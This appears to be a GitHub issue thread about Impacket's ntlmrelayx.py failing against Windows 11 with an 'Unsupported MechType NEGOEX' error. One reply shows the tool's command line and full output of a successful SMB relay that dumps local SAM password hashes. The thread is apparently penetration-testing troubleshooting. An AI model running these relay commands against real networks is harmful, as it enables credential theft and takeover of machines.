Issues relaying NTLM Authentication from Win11- ntlmrelayx.py

[bdrogja]

Configuration

impacket version: v0.10.0 Python version: 3.10.4 Target OS: Kali 2022.2 Victim OS: Win11

Debug Output With Command String

[*] SMBD-Thread-3885 (process_request_thread): Connection from CORP/USER@10.1.12.83 controlled, attacking target smb://10.1.12.83 [-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism'

Additional context

This error appears, when I try to relay the user from a win11 victim. It works on win10 as expected. Does somebody know what this error exactly means?

[NtAlexio2]

There is no problem with default configurations:

┌──(kali㉿kali)-[~/Desktop/impacket/examples]
└─$ python ntlmrelayx.py -smb2support -t smb://192.168.129,12
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server

[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.129,11, attacking target smb://192.168.129,12
[*] Authenticating against smb://192.168.129,12 as CORP/ADMIN SUCCEED
[*] SMBD-Thread-7: Connection from 192.168.129,11 controlled, but there are no more targets left!
[*] SMBD-Thread-8: Connection from 192.168.129,11 controlled, but there are no more targets left!
[*] SMBD-Thread-9: Connection from 192.168.129,11 controlled, but there are no more targets left!
[*] SMBD-Thread-10: Connection from 192.168.129,11 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x70fe2b7e922573b298f6ec9d8036259d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5b83245236c8541b4d417fa214602fa8:::
[*] Done dumping SAM hashes for host: 192.168.129,12
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Please share more details, like this:

• The exact command-line you used
• Target host (192.168.129,12) is a domain-joined Windows 11 21H2 machine
• The incoming credential (CORP/ADMIN) is domain admin account.

And the most important one: Wireshark capture .pcap file! For this, follow these steps:

• Prepare your environment and setup (don't forget to setup Wireshark in attacker host, if it is not installed yet)
• Start ntlmrelayx.py
• Open Wireshark on attacker host
• Choose the right network interface to capture, in Wireshark
• Start Wireshark capture
• Run attack
• Stop Wireshark capture
• Save the capture file in .pcapng
• Done!

Attach the capture file for and specify details of scenario, to make it solved!

[rockabillycat666]

Having the same Issue as @bdrogja on a Windows 10 machine, related to NEGOEX - SPNEGO Extended Negotiation Security Mechanism:

`└─$ ntlmrelayx.py -tf target.txt -smb2support Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[] Protocol Client SMB loaded.. [] Protocol Client SMTP loaded.. [] Protocol Client DCSYNC loaded.. [] Protocol Client MSSQL loaded.. [] Protocol Client LDAPS loaded.. [] Protocol Client LDAP loaded.. [] Protocol Client HTTP loaded.. [] Protocol Client HTTPS loaded.. [] Protocol Client IMAP loaded.. [] Protocol Client IMAPS loaded.. [] Protocol Client RPC loaded.. [] Running in relay mode to hosts in targetfile [] Setting up SMB Server [] Setting up HTTP Server [*] Setting up WCF Server

[] Servers started, waiting for connections [-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' [] SMBD-Thread-4 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11 [-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' [] SMBD-Thread-5 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11 [-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' [] SMBD-Thread-6 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11 [-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' [] SMBD-Thread-7 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11 [-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' [] SMBD-Thread-8 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11 [-] Unsupported MechType 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' [*] SMBD-Thread-9 (process_request_thread): Connection from HACKPROOF/REGULARUSER@192.168.2.11 controlled, attacking target smb://192.168.2.11`

I believe this has to do with Kerberos authentication and not NTLM